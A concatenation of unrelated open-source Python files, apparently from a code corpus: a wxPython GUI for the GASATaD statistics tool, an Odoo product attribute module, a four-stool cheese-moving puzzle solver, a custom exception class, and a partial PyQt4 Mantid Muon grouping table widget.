self.m_undo.Enable()
self.controller.resetDataToAnalyse()
self.refreshGUI()
def refreshGUI(self, updateDataInfo=True, markNans=True):
# Reset plots options
self.histogramOptions = {}
self.scatterPlotOptions = {}
self.boxPlotOptions = {}
self.pieChartOptions = {}
self.barChartOptions = {}
if not self.controller.programState.dataToAnalyse.empty: # data present
self.fillInGrid() # Fills wxgrid from the data of the pandas dataframe
self.m_dataTable.AutoSize()
lastColumnOrigSize = self.m_dataTable.GetColSize(self.controller.getNumberOfColumns() - 1)
self.m_dataTable.SetColSize(self.controller.getNumberOfColumns() - 1, lastColumnOrigSize + 30)
self.m_dataTable.ClearSelection()
if markNans:
self.markNans()
if updateDataInfo:
self.updateDataInfo()
self.Layout()
self.m_dataTable.Enable(True)
self.m_dataTable.SetFocus()
# Graphs
self.histogramBtn.Enable(True)
self.scatterPlotBtn.Enable(True)
self.pieChartBtn.Enable(True)
self.boxPlotBtn.Enable(True)
self.barChartBtn.Enable(True)
# Buttons
self.openNewFileBtn.Enable(False)
self.addFileBtn.Enable(True)
self.resetDataBtn.Enable(True)
self.exportDataBtn.Enable(True)
self.descriptiveStatsBtn.Enable(True)
self.significanceTestBtn.Enable(True)
# Menus
self.m_menuNewFile.Enable(False)
self.m_menuAddFile.Enable(True)
self.m_menuResetData.Enable(True)
self.m_menuExportData.Enable(True)
self.m_addNewColumn.Enable(True)
self.m_deleteColumns.Enable(True)
else: # no data
self.fillInGrid()
self.m_dataTable.AppendRows(45)
self.m_dataTable.AppendCols(45)
self.m_dataTable.Enable(False)
# Graphs
self.histogramBtn.Enable(False)
self.scatterPlotBtn.Enable(False)
self.pieChartBtn.Enable(False)
self.boxPlotBtn.Enable(False)
self.barChartBtn.Enable(False)
# Buttons
self.openNewFileBtn.Enable(True)
self.addFileBtn.Enable(False)
self.resetDataBtn.Enable(False)
self.exportDataBtn.Enable(False)
self.descriptiveStatsBtn.Enable(False)
self.significanceTestBtn.Enable(False)
# Menus
self.m_menuNewFile.Enable(True)
self.m_menuAddFile.Enable(False)
self.m_menuResetData.Enable(False)
self.m_menuExportData.Enable(False)
self.m_addNewColumn.Enable(False)
self.m_deleteColumns.Enable(False)
self.updateDataInfo()
self.m_dataTable.SetColLabelSize(30)
self.m_dataTable.SetRowLabelSize(80)
self.Layout()
def deleteColumnsByLabels(self, event):
selectedColumnsInterface = DeleteColumnsInterface(self,
list(self.controller.programState.dataToAnalyse.columns))
if selectedColumnsInterface.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo delete columns")
self.m_undo.Enable()
listOfColumns = selectedColumnsInterface.getSelectedColumns()
self.controller.deleteColumns(listOfColumns)
self.refreshGUI()
# if self.controller.programState.dataToAnalyse.empty:
# self.resetData(None)
# else:
# self.refreshGUI()
def createNewColumn(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
# Minimun and maximum for using when spinCtrls are created
minimum = int(self.controller.programState.dataToAnalyse.min(numeric_only=True).min().round()) - 1
maximum = int(self.controller.programState.dataToAnalyse.max(numeric_only=True).max().round()) + 1
factorFrame = AddColumnInterface(self, (self.controller.integerValues + self.controller.floatValues),
list(self.controller.programState.dataToAnalyse.columns), minimum, maximum)
factorFrame.Show(True)
if factorFrame.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo add new column")
self.m_undo.Enable()
factorsFromInterface, self.selectedRadioButton, tagRestValues, nameOfFactor = factorFrame.returnFactors()
self.controller.addColumn(factorsFromInterface, self.selectedRadioButton, tagRestValues, nameOfFactor)
self.refreshGUI()
numCols = self.controller.getNumberOfColumns()
self.m_dataTable.SetGridCursor(0, numCols - 1)
self.m_dataTable.MakeCellVisible(0, numCols - 1)
self.m_dataTable.SelectCol(numCols - 1)
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createBasicStatisticsInterface(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
self.tagsAndValues.clear()
for value in self.controller.characterValues:
listTags = list(self.controller.programState.dataToAnalyse[value].unique())
# listTags = [x for x in listTags if unicode(x).encode('utf-8') != 'nan']
listTags = [x for x in listTags if str(x) != 'nan']
self.tagsAndValues[value] = numpy.asarray(listTags)
# self.tagsAndValues[value] = self.controller.programState.dataToAnalyse[str(value)].unique()
dataFrame = self.controller.programState.dataToAnalyse
variablesList = self.controller.floatValues + self.controller.integerValues
minimum = int(self.controller.programState.dataToAnalyse.min(numeric_only=True).min().round()) - 1
maximum = int(self.controller.programState.dataToAnalyse.max(numeric_only=True).max().round()) + 1
basicStatsInterface = BasicStatisticsInterface(self, variablesList, self.tagsAndValues,
self.controller.integerValues, dataFrame)
if basicStatsInterface.ShowModal() == wx.ID_CLOSE:
basicStatsInterface.Destroy()
else:
wx.MessageBox("There are no numerical values in the data", "ERROR", wx.OK | wx.ICON_EXCLAMATION)
def doSignificanceTest(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
self.tagsAndValues.clear()
for value in self.controller.characterValues:
listTags = list(self.controller.programState.dataToAnalyse[value].unique())
listTags = [x for x in listTags if str(x) != 'nan']
# listTags = [x for x in listTags if unicode(x).encode('utf-8') != 'nan']
self.tagsAndValues[value] = numpy.asarray(listTags)
# self.tagsAndValues[value] = self.controller.programState.dataToAnalyse[str(value)].unique()
dataFrame = self.controller.programState.dataToAnalyse
variablesList = self.controller.floatValues + self.controller.integerValues
significanceTestFrame = SignificanceTestInterface(self, variablesList, self.tagsAndValues,
self.controller.integerValues, dataFrame)
significanceTestFrame.Show()
if significanceTestFrame.ShowModal() == wx.ID_CANCEL:
significanceTestFrame.Destroy()
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createHistogram(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
histogramFrame = HistogramInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.histogramOptions)
if histogramFrame.ShowModal() == wx.ID_OK:
self.histogramOptions = histogramFrame.getHistogramOptions()
self.controller.createHistogram(self.histogramOptions)
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createScatterPlot(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
scatterFrame = ScatterPlotInterface(self, self.controller.floatValues + self.controller.integerValues,
self.scatterPlotOptions)
if scatterFrame.ShowModal() == wx.ID_OK:
self.scatterPlotOptions = scatterFrame.getScatterPlotOptions()
self.controller.createScatterPlot(self.scatterPlotOptions)
else:
wx.MessageBox("There are no numerical values", "Attention")
def createPieChart(self, event):
if (len(self.controller.characterValues) != 0):
pieChartFrame = PieChartInterface(self, self.controller.characterValues, self.pieChartOptions)
if pieChartFrame.ShowModal() == wx.ID_OK:
self.pieChartOptions = pieChartFrame.getPieChartOptions()
self.controller.createPieChart(self.pieChartOptions)
else:
wx.MessageBox("There are no categorical variables", "ERROR")
def createBoxPlot(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
boxPlotFrame = BoxPlotInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.boxPlotOptions)
if boxPlotFrame.ShowModal() == wx.ID_OK:
self.boxPlotOptions = boxPlotFrame.getBoxPlotOptions()
self.controller.createBoxPlot(self.boxPlotOptions)
else:
wx.MessageBox("There are no numerical variables", "ERROR")
def createBarChart(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
barChartFrame = BarChartInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.barChartOptions)
if barChartFrame.ShowModal() == wx.ID_OK:
self.barChartOptions = barChartFrame.getBarChartOptions()
self.controller.createBarChart(self.barChartOptions)
else:
wx.MessageBox("There are no numerical variables", "ERROR")
def showWarning(self):
dlg = wx.MessageDialog(None, "Lower limit must be smaller than the upper limit", "Be careful!",
wx.OK | wx.ICON_EXCLAMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def informationAboutNullValues(self):
dlg = wx.MessageDialog(None, "There are null values in this File", "Null Values", wx.OK | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def appInformation(self, event):
description = u'Graphical Application for Statistical Analysis of TAbulated Data\n\nDaniel Pereira Alonso\nLeandro Rodr\u00EDguez Liñares\nMar\u00EDa Jos\u00E9 Lado Touriño'
info = wx.adv.AboutDialogInfo()
info.SetName('GASATaD')
info.SetVersion(str(self.params['version']))
info.SetDescription(description)
info.SetCopyright(u"\u00A9 2019");
info.SetIcon(wx.Icon(os.path.dirname(os.path.abspath(__file__)) + "/GasatadLogo.ico", wx.BITMAP_TYPE_ICO))
info.SetWebSite("https://milegroup.github.io/gasatad/")
wx.adv.AboutBox(info)
def closeApp(self, event):
emptyData = False
try:
emptyData = self.controller.programState.dataToAnalyse.empty
except:
emptyData = True
if not emptyData:
dlg = wx.MessageDialog(self, "Do you really want to close GASATaD?", "Confirm Exit",
wx.OK | wx.CANCEL | wx.ICON_QUESTION | wx.CANCEL_DEFAULT)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_OK:
self.configSave()
self.Destroy()
else:
self.configSave()
self.Destroy()
def configInit(self):
"""If config dir and file does not exist, it is created
If config file exists, it is loaded"""
# print "Intializing configuration"
if not os.path.exists(self.params['configDir']):
# print "Directory does not exists ... creating"
os.makedirs(self.params['configDir'])
if os.path.exists(self.params['configFile']):
# print "Loading config"
self.configLoad()
else:
# print "Saving config"
self.configSave()
def configSave(self):
""" Saves configuration file"""
try:
# from ConfigParser import SafeConfigParser
# options = SafeConfigParser()
import configparser
options = configparser.ConfigParser()
options.add_section('gasatad')
for param in self.params['options'].keys():
# In windows, if the path contains non-ascii characters, it is not saved in the configuration file
validParam = True
if param == "dirfrom" and sys.platform == "win32":
tmpStr = self.params['options'][param]
if any(ord(char) > 126 for char in tmpStr):
validParam = False
if validParam:
options.set('gasatad', param, self.params['options'][param])
# print " ",param," - ",self.params['options'][param]
tempF = open(self.params['configFile'], 'w')
# print("Trying to write configuration in ", self.params['configFile'])
options.write(tempF)
tempF.close()
if platform == "win32":
import win32api, win32con
win32api.SetFileAttributes(self.params['configDir'], win32con.FILE_ATTRIBUTE_HIDDEN)
except:
return
def configLoad(self):
""" Loads configuration file"""
# print "Loading file",self.params['configFile']
try:
import configparser
options = configparser.ConfigParser()
options.read(self.params['configFile'])
for section in options.sections():
for param, value in options.items(section):
self.params['options'][param] = value
# print "param",param," - value",value
except:
# print "Problem loading configuration file", self.params['configFile']
try:
os.remove(self.params['configFile'])
except:
pass
return
class ReplaceInColInterface(wx.Dialog):
def __init__(self, parent, listOfTags):
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Replace in column", size=wx.DefaultSize,
pos=wx.DefaultPosition)
mainSizer = wx.BoxSizer(wx.VERTICAL)
topSizer = wx.BoxSizer(wx.HORIZONTAL)
leftSizer = wx.BoxSizer(wx.VERTICAL)
leftSizer.Add(wx.StaticText(self, -1, "Old value:"))
self.cb = wx.ComboBox(self, choices=listOfTags, value=listOfTags[0], size=(160, -1))
leftSizer.Add(self.cb, 0, wx.TOP | wx.LEFT, 5)
topSizer.Add(leftSizer, 0, wx.ALL, 10)
rightSizer = wx.BoxSizer(wx.VERTICAL)
rightSizer.Add(wx.StaticText(self, -1, "New value (empty for 'null'):"))
self.tc = wx.TextCtrl(self, size=(160, -1))
rightSizer.Add(self.tc, 0, wx.TOP | wx.LEFT | wx.EXPAND, 5)
topSizer.Add(rightSizer, 0, wx.ALL, 10)
mainSizer.Add(topSizer)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
mainSizer.Add(btns, 0, wx.BOTTOM | wx.ALIGN_RIGHT, 10)
mainSizer.Fit(self)
self.SetSizer(mainSizer)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Show(True)
def getValues(self):
return self.cb.GetValue(), self.tc.GetValue()
class DeleteColumnsInterface(wx.Dialog):
def __init__(self, parent, listOfColumns):
# The dictionary is initialized -> Key = name of column; value = False (because neither checkbox is selected yet)
self.selectedColumns = dict.fromkeys(listOfColumns, False)
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Delete columns", pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
# Sizer where the names of the columns are placed
fgSizerCheckBoxColumns = wx.FlexGridSizer(0, 4, 0, 0)
fgSizerCheckBoxColumns.SetFlexibleDirection(wx.BOTH)
fgSizerCheckBoxColumns.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
fgSizerCheckBoxColumns.AddGrowableCol(1)
for column in listOfColumns:
self.m_checkBox = wx.CheckBox(self, wx.ID_ANY, str(column), wx.DefaultPosition, wx.DefaultSize, 0)
fgSizerCheckBoxColumns.Add(self.m_checkBox, 0, wx.EXPAND | wx.ALL, 5)
self.Bind(wx.EVT_CHECKBOX, self.changeValueCheckBox, self.m_checkBox)
gbSizer1.Add(fgSizerCheckBoxColumns, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.ALIGN_RIGHT | wx.EXPAND | wx.ALL,
5)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
gbSizer1.Add(btns, wx.GBPosition(1, 0), wx.GBSpan(1, 1), wx.BOTTOM | wx.ALIGN_RIGHT, 10)
self.SetSizer(gbSizer1)
gbSizer1.Fit(self)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Show(True)
def changeValueCheckBox(self, event):
checkBox = event.GetEventObject()
if checkBox.IsChecked():
self.selectedColumns[checkBox.GetLabel()] = True
else:
self.selectedColumns[checkBox.GetLabel()] = False
def getSelectedColumns(self):
listSelectedColumns = []
for key in self.selectedColumns.keys():
if self.selectedColumns[key]:
listSelectedColumns.append(key)
return listSelectedColumns
class ExportCsvOptions(wx.Dialog):
def __init__(self, parent):
self.exportOptions = OptionsInExportInterface()
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Export csv", pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
# Sizer for the options
fgSizerExportOptions = wx.FlexGridSizer(0, 2, 0, 0)
fgSizerExportOptions.SetFlexibleDirection(wx.BOTH)
fgSizerExportOptions.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
fgSizerExportOptions.AddGrowableCol(1)
self.characterSet = wx.StaticText(self, wx.ID_ANY, u"Character set:", wx.DefaultPosition, wx.DefaultSize, 0)
self.characterSet.Wrap(-1)
fgSizerExportOptions.Add(self.characterSet, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = ["UTF-8", "ASCII", "Latin_1"]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setCharacterSetValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
self.xAxisName = wx.StaticText(self, wx.ID_ANY, u"Field delimiter:", wx.DefaultPosition, wx.DefaultSize, 0)
self.xAxisName.Wrap(-1)
fgSizerExportOptions.Add(self.xAxisName, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = [",", ";", ":", "{Tab}", "{Space}"]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setFieldDelimiterValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
self.yAxisName = wx.StaticText(self, wx.ID_ANY, u"Decimal separator:", wx.DefaultPosition, wx.DefaultSize, 0)
self.yAxisName.Wrap(-1)
fgSizerExportOptions.Add(self.yAxisName, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = [".", ","]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setDecimalSeparatorValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
gbSizer1.Add(fgSizerExportOptions, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.EXPAND | wx.ALL, 5)
# Additional options
AdditionalOptSizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u"Additional options"), wx.HORIZONTAL)
self.wColumnNames = wx.CheckBox(self, wx.ID_ANY, "Write column names", wx.DefaultPosition, wx.DefaultSize, 0)
AdditionalOptSizer.Add(self.wColumnNames, 0, wx.ALL, 10)
self.wColumnNames.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.setWriteColumnNameValue, self.wColumnNames)
self.wRowNames = wx.CheckBox(self, wx.ID_ANY, "Write row names (Index)", wx.DefaultPosition, wx.DefaultSize, 0)
AdditionalOptSizer.Add(self.wRowNames, 0, wx.ALL, 10)
self.wRowNames.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.setWriteRowNames, self.wRowNames)
gbSizer1.Add(AdditionalOptSizer, wx.GBPosition(1, 0), wx.GBSpan(1, 1), wx.ALL, 20)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
gbSizer1.Add(btns, wx.GBPosition(3, 0), wx.GBSpan(1, 1), wx.EXPAND | wx.ALL, 5)
self.SetSizer(gbSizer1)
gbSizer1.Fit(self)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Fit()
self.Show(True)
def setCharacterSetValue(self, event):
option = event.GetEventObject().GetValue().lower()
self.exportOptions.setCharacterSet(option)
def setFieldDelimiterValue(self, event):
option = event.GetEventObject().GetValue()
if option == "{Tab}":
self.exportOptions.setFieldDelimiter("\t")
elif option == "{Space}":
self.exportOptions.setFieldDelimiter(" ")
else:
self.exportOptions.setFieldDelimiter(option)
def setDecimalSeparatorValue(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setdecimalSeparator(option)
def setWriteColumnNameValue(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setWriteColNames(option)
def setWriteRowNames(self, event):
option = event.GetEventObject().GetValue()
self.exportOptions.setWriteRowNames(option)
def getSelectedExportOptions(self):
return self.exportOptions
| gpl-3.0 | 7,454,908,388,289,037,000 | 42.022727 | 181 | 0.60029 | false | 3.885765 | true | false | false |
xpansa/odoomrp-wip | product_variants_no_automatic_creation/models/product_attribute_configurator.py | 3 | 2471 | # -*- coding: utf-8 -*-
# (c) 2015 Oihane Crucelaegui - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import api, fields, models
from openerp.addons import decimal_precision as dp
class ProductAttributeConfigurator(models.AbstractModel):
_name = 'product.attribute.configurator'
@api.one
@api.depends('attribute')
def _get_possible_attribute_values(self):
self.possible_values = self.attribute.value_ids.sorted()
@api.one
@api.depends('value')
def _get_price_extra(self):
self.price_extra = sum(self.value.mapped('price_ids.price_extra'))
attribute = fields.Many2one(comodel_name='product.attribute',
string='Attribute')
value = fields.Many2one(comodel_name='product.attribute.value',
domain="[('attribute_id', '=', attribute),"
"('id', 'in', possible_values[0][2])]",
string='Value')
possible_values = fields.Many2many(
comodel_name='product.attribute.value',
compute='_get_possible_attribute_values')
price_extra = fields.Float(
compute='_get_price_extra', string='Attribute Price Extra',
digits=dp.get_precision('Product Price'),
help="Price Extra: Extra price for the variant with this attribute"
" value on sale price. eg. 200 price extra, 1000 + 200 = 1200.")
class ProductProductAttribute(models.Model):
_inherit = 'product.attribute.configurator'
_name = 'product.product.attribute'
@api.one
@api.depends('attribute', 'product.product_tmpl_id',
'product.product_tmpl_id.attribute_line_ids')
def _get_possible_attribute_values(self):
attr_values = self.env['product.attribute.value']
for attr_line in self.product.product_tmpl_id.attribute_line_ids:
if attr_line.attribute_id.id == self.attribute.id:
attr_values |= attr_line.value_ids
self.possible_values = attr_values.sorted()
@api.one
@api.depends('value', 'product.product_tmpl_id')
def _get_price_extra(self):
price_extra = 0.0
for price in self.value.price_ids:
if price.product_tmpl_id.id == self.product.product_tmpl_id.id:
price_extra = price.price_extra
self.price_extra = price_extra
product = fields.Many2one(
comodel_name='product.product', string='Product')
| agpl-3.0 | 9,041,073,232,427,097,000 | 38.854839 | 75 | 0.631323 | false | 3.766768 | false | false | false |
Connor-Y/csc148-assignment1 | Tour.py | 1 | 2464 | # Copyright 2013 Gary Baumgartner
# Distributed under the terms of the GNU General Public License.
#
# This file is part of Assignment 1, CSC148, Fall 2013.
#
# This is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file. If not, see <http://www.gnu.org/licenses/>.
from DomainStools import DomainStools
from DomainStools import Cheese
import math
def tour_of_four_stools(n: int, stools: DomainStools) -> None:
"""Move an n cheese tower from the first stool in stools to the fourth.
n - number of cheeses on the first stool of stools
stools - a DomainStools with a tower of cheese on the first stool
and three other empty stools
"""
tour_helper(n, stools, 0, 1, 2, 3)
def tour_helper(n: int, stools: DomainStools, input: int, aux1: int, aux2: int, output: int) -> None:
if n == 1:
stools.move(stools.select_top_cheese(input), stools.select_top_cheese(output))
else:
i = math.ceil(n/2)
tour_helper(n-i, stools, input, aux2, output, aux1)
tour_of_three_stools(i, stools, input, aux2, output)
tour_helper(n-i, stools, aux1, input, aux2, output)
def tour_of_three_stools(n: int, stools: DomainStools, input: int, aux: int, output: int) -> None:
if n == 1:
stools.move(stools.select_top_cheese(input), stools.select_top_cheese(output))
else:
tour_of_three_stools(n-1, stools, input, output, aux)
tour_of_three_stools(1, stools, input, aux, output)
tour_of_three_stools(n-1, stools, aux, input, output)
if __name__ == '__main__':
four_stools = DomainStools(4)
for s in range(7, 0, -1):
four_stools.add(0, Cheese(s))
tour_of_four_stools(7, four_stools)
print(four_stools.number_of_moves())
#three_stools = DomainStools(3)
#for s in range(15, 0, -1):
# three_stools.add(0, Cheese(s))
#tour_of_three_stools(15, three_stools, 0, 1, 2)
#print(three_stools.number_of_moves())
| gpl-3.0 | 8,115,787,142,392,570,000 | 38.111111 | 101 | 0.676948 | false | 3.072319 | false | false | false |
keikenuro/kaiju-libnow | kaiju_libnow/libnow/src/business/exceptions/BaseException.py | 1 | 1668 | import os
import sys
class BaseException(Exception):
"""
BaseException class for all the others
exceptions defined for this app.
"""
def __init__(self, message, cause=None, *args, **kwargs):
"""
BaseException gets a message and a cause. These params
will be displayed when the program raises an exception that
is a child of this class.
:param message: obligatory
:param cause: might be None
"""
super(Exception, self).__init__()
self.message = message
self.cause = cause
try:
exc_type, exc_obj, exc_tb = sys.exc_info()
self.filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
self.fileline = exc_tb.tb_lineno
except Exception, e:
print args, kwargs
self.filename = ""
self.fileline = ""
def __str__(self):
"""
Override the str method for all the exceptions.
:return: str
"""
# Get the exception class name
exception_class_name = self.__class__.__name__
# This is the str
to_return = "%s: %s"%(exception_class_name, self.message)
if self.cause:
# Get the str of the cause
to_return += "\r\nError at {filename}@{line}. Caused by: {cause}".format(
filename=self.filename,
line=self.fileline,
cause=self.cause
)
return to_return
def __repr__(self):
"""
Override the __repr__ method for all the exceptions.
:return: str
"""
return str(self)
| gpl-3.0 | 5,302,735,792,033,693,000 | 26.8 | 85 | 0.535372 | false | 4.321244 | false | false | false |
mganeva/mantid | scripts/Muon/GUI/Common/grouping_table_widget/grouping_table_widget_view.py | 1 | 16836 | from __future__ import (absolute_import, division, print_function)
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import pyqtSignal as Signal
import sys
from Muon.GUI.Common.utilities import table_utils
from Muon.GUI.Common import message_box
group_table_columns = {0: 'group_name', 1: 'detector_ids', 2: 'number_of_detectors'}
class GroupingTableView(QtGui.QWidget):
# For use by parent widget
dataChanged = Signal()
addPairRequested = Signal(str, str)
@staticmethod
def warning_popup(message):
message_box.warning(str(message))
def __init__(self, parent=None):
super(GroupingTableView, self).__init__(parent)
self.grouping_table = QtGui.QTableWidget(self)
self.set_up_table()
self.setup_interface_layout()
self.grouping_table.cellChanged.connect(self.on_cell_changed)
self._validate_group_name_entry = lambda text: True
self._validate_detector_ID_entry = lambda text: True
self._on_table_data_changed = lambda: 0
# whether the table is updating and therefore we shouldn't respond to signals
self._updating = False
# whether the interface should be disabled
self._disabled = False
def setup_interface_layout(self):
self.setObjectName("GroupingTableView")
self.resize(500, 500)
self.add_group_button = QtGui.QToolButton()
self.remove_group_button = QtGui.QToolButton()
self.group_range_label = QtGui.QLabel()
self.group_range_label.setText('Group Asymmetry Range from:')
self.group_range_min = QtGui.QLineEdit()
self.group_range_min.setEnabled(False)
positive_float_validator = QtGui.QDoubleValidator(0.0, sys.float_info.max, 5)
self.group_range_min.setValidator(positive_float_validator)
self.group_range_use_first_good_data = QtGui.QCheckBox()
self.group_range_use_first_good_data.setText(u"\u03BCs (From data file)")
self.group_range_use_first_good_data.setChecked(True)
self.group_range_max = QtGui.QLineEdit()
self.group_range_max.setEnabled(False)
self.group_range_max.setValidator(positive_float_validator)
self.group_range_use_last_data = QtGui.QCheckBox()
self.group_range_use_last_data.setText(u"\u03BCs (From data file)")
self.group_range_use_last_data.setChecked(True)
self.group_range_to_label = QtGui.QLabel()
self.group_range_to_label.setText('to:')
self.group_range_layout = QtGui.QGridLayout()
self.group_range_layout_min = QtGui.QHBoxLayout()
self.group_range_layout.addWidget(self.group_range_label, 0, 0)
self.group_range_layout.addWidget(self.group_range_min, 0, 1)
self.group_range_layout.addWidget(self.group_range_use_first_good_data, 0, 2)
self.group_range_layout_max = QtGui.QHBoxLayout()
self.group_range_layout.addWidget(self.group_range_to_label, 1, 0, QtCore.Qt.AlignRight)
self.group_range_layout.addWidget(self.group_range_max, 1, 1)
self.group_range_layout.addWidget(self.group_range_use_last_data, 1, 2)
size_policy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
size_policy.setHorizontalStretch(0)
size_policy.setVerticalStretch(0)
size_policy.setHeightForWidth(self.add_group_button.sizePolicy().hasHeightForWidth())
size_policy.setHeightForWidth(self.remove_group_button.sizePolicy().hasHeightForWidth())
self.add_group_button.setSizePolicy(size_policy)
self.add_group_button.setObjectName("addGroupButton")
self.add_group_button.setToolTip("Add a group to the end of the table")
self.add_group_button.setText("+")
self.remove_group_button.setSizePolicy(size_policy)
self.remove_group_button.setObjectName("removeGroupButton")
self.remove_group_button.setToolTip("Remove selected/last group(s) from the table")
self.remove_group_button.setText("-")
self.horizontal_layout = QtGui.QHBoxLayout()
self.horizontal_layout.setObjectName("horizontalLayout")
self.horizontal_layout.addWidget(self.add_group_button)
self.horizontal_layout.addWidget(self.remove_group_button)
self.spacer_item = QtGui.QSpacerItem(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontal_layout.addItem(self.spacer_item)
self.horizontal_layout.setAlignment(QtCore.Qt.AlignLeft)
self.vertical_layout = QtGui.QVBoxLayout(self)
self.vertical_layout.setObjectName("verticalLayout")
self.vertical_layout.addWidget(self.grouping_table)
self.vertical_layout.addLayout(self.horizontal_layout)
self.vertical_layout.addLayout(self.group_range_layout)
self.setLayout(self.vertical_layout)
def set_up_table(self):
self.grouping_table.setColumnCount(3)
self.grouping_table.setHorizontalHeaderLabels(["Group Name", "Detector IDs", "N Detectors"])
header = self.grouping_table.horizontalHeader()
header.setResizeMode(0, QtGui.QHeaderView.Stretch)
header.setResizeMode(1, QtGui.QHeaderView.Stretch)
header.setResizeMode(2, QtGui.QHeaderView.ResizeToContents)
vertical_headers = self.grouping_table.verticalHeader()
vertical_headers.setMovable(False)
vertical_headers.setResizeMode(QtGui.QHeaderView.ResizeToContents)
vertical_headers.setVisible(True)
self.grouping_table.horizontalHeaderItem(0).setToolTip("The name of the group :"
"\n - The name must be unique across all groups/pairs"
"\n - The name can only use digits, characters and _")
self.grouping_table.horizontalHeaderItem(1).setToolTip("The sorted list of detectors :"
"\n - The list can only contain integers."
"\n - , is used to separate detectors or ranges."
"\n - \"-\" denotes a range, i,e \"1-5\" is the same as"
